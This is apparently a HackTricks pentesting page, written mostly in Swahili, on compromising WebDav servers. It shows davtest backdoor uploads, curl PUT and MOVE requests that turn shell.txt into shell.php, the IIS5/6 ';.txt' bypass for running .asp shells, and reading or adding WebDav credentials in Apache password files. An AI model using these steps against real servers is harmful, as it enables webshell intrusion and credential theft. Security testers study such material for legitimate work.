WebDav

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Unaposhughulika na HTTP Server yenye WebDav iliyoanzishwa, inawezekana kudhibiti faili ikiwa una vithibitisho sahihi, ambavyo kawaida vinathibitishwa kupitia HTTP Basic Authentication. Kupata udhibiti wa seva kama hiyo mara nyingi kunahusisha kupakia na kutekeleza webshell.

Upatikanaji wa seva ya WebDav kawaida unahitaji vithibitisho halali, huku WebDav bruteforce ikiwa njia ya kawaida ya kuzipata.

Ili kushinda vizuizi kwenye upakiaji wa faili, hasa vile vinavyokataza utekelezaji wa skripti za upande wa seva, unaweza:

  • Kupakia faili zenye nyongeza zinazoweza kutekelezwa moja kwa moja ikiwa hazijakatazwa.
  • Kubadilisha jina la faili zisizoweza kutekelezwa zilizopakiwa (kama .txt) kuwa nyongeza inayoweza kutekelezwa.
  • Kopi faili zisizoweza kutekelezwa zilizopakiwa, ukibadilisha nyongeza yao kuwa ile inayoweza kutekelezwa.

DavTest

Davtest inajaribu kupakia faili kadhaa zenye nyongeza tofauti na kuangalia ikiwa nyongeza hiyo inatekelezwa:

bash
davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension

Hii haimaanishi kwamba .txt na .html extensions zinafanywa. Hii inamaanisha kwamba unaweza kufikia hizi faili kupitia mtandao.

Cadaver

Unaweza kutumia chombo hiki kuungana na WebDav server na kufanya vitendo (kama kupakia, kuhamasisha au kufuta) kwa mikono.

cadaver <IP>

PUT ombi

curl -T 'shell.txt' 'http://$ip'

MOVE ombi

bash
curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'

IIS5/6 WebDav Vulnerability

Ushirikiano huu ni wa kuvutia sana. WebDav ha iruhusu kupakia au kurekebisha faili zenye kiambishi .asp. Lakini unaweza kuepuka hii kwa kuongeza mwishoni mwa jina ";.txt" na faili itatekelezwa kana kwamba ni faili ya .asp (unaweza pia kutumia ".html" badala ya ".txt" lakini USISAHAU ";").

Kisha unaweza kupakia shell yako kama faili ya ".txt" na kunakili/kuhamasisha kwenye faili ya ".asp;.txt". Ukifungua faili hiyo kupitia seva ya wavuti, itatekelezwa (cadaver itasema kwamba hatua ya kuhamasisha haikufanya kazi, lakini ilifanya).

Post credentials

Ikiwa Webdav ilikuwa ikitumia seva ya Apache unapaswa kuangalia tovuti zilizowekwa kwenye Apache. Kawaida:
_/etc/apache2/sites-enabled/000-default_

Ndani yake unaweza kupata kitu kama:

ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user

Kama unavyoona kuna faili zenye credentials halali za seva ya webdav:

/etc/apache2/users.password

Ndani ya aina hii ya faili utaona jina la mtumiaji na hash ya nenosiri. Hizi ndizo sifa zinazotumiwa na seva ya webdav kuthibitisha watumiaji.

Unaweza kujaribu kufungua hizo, au kuongeza zaidi ikiwa kwa sababu fulani unataka kufikia seva ya webdav:

bash
htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password

Ili kuangalia kama akiba mpya inafanya kazi unaweza kufanya:

bash
wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q

Marejeo

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks